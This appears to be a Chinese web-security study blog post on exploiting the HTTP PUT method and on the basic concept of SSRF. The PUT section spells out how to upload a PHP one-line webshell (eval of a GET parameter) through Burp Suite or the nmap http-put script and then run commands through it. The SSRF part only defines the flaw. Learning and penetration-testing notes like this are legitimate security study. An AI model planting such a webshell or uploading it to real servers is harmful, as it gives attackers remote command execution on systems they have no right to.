Web安全学习笔记(二):HTTP Put方法利用和SSRF基本概念

---------------开始---------------

0x01:前言

        之前在挖公益SRC的时候,用Nmap扫描时候可以扫到http支持的方法,其中有几个可以利用PUT方法,作为标准的小菜鸟,听说过这个方法,但是具体利用可真不会呀,也在网上找了相关文章,但是都不详细。直到昨天看到一篇文章,今天上午拿来学习了一番,具体讲的是如何利用,这个确实不错,对于实战来说提升很大。回过头来去找那几个网站,可是PUT方法已经被禁用了,对于这个方法的实战,有缘见到一定好好鼓捣一番。

        那篇文章有很多利用方法,基于我现在也只学了两招利用的方法,对于我来说够用了。

        对于SSRF今天基本看了下概念,大致了解了理论的意思,但是具体实战今天确实没做,过两天找两个例子去实战一下,加深一下SSRF的理解。这个漏洞也一定要熟练掌握。

---------------正题(一)---------------

●HTTP Put方法利用:

         PUT方法请求服务器去把请求里的实体存储在请求URI(Request-URI)标识下。

    ▶▶▶.BurpSuite利用Put方法:

        ①.设置相关代理 ---> 抓包拦截请求 ---> 右击发送到Repeater模块

        ②.将GET方法替换为PUT方法 ---> 上传一个test.php文件

        ③.在请求体中写上恶意利用代码(写个一句话木马就可以了)

        ♢穿插一个PHP一句话木马(<?php @eval($_GET["cmd"])?> )

        ④.如果响应头的状态码显示"201 Created",说明已被成功创建

        ⑤. 创建成功后一句话木马的利用,xxx.com/test.php?cmd="想要执行的命令"

     

    ▶▶▶.Nmap利用Put方法:

        利用命令:

            nmap -p 80 目标IP地址 -script http-put -script-args http-put.url="需上传目标网址的路径", http-put.file="你要上传文件的位置" 

            若显示:"http-put: /xxx/test.php was Successfully created" 说明上传成功了

注:其实整理这两个是为了留给自己看了,下面贴一下那篇文章的地方,对于Put方法的利用大概有个六七种,大家都可以学习一下~

通往知识的大门:http://www.4hou.com/technology/12885.html

---------------正题(二)---------------

●服务端请求伪造(Server-Side Request Forgery, SSRF)

▶定义:

        由攻击者构造形成由服务端发起请求的一个安全漏洞,一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。正因它是由服务端发起的,故它能够请求到与它相连而与外网隔离的内部系统。

▶形成原因:

        服务端提供了从其他服务器应用获取数据的功能,但没有对目标地址过滤与限制。

        今天对于SSRF仅是了解了个概念,然后就去找SRC实战挖洞了,今天毫无战果。对于SSRF的实战回来找个靶机来试试,到时在来这记录下。

--------今天就这么结束了,时间过得真快--------

猜你喜欢

转载自www.cnblogs.com/7089fy/p/9440972.html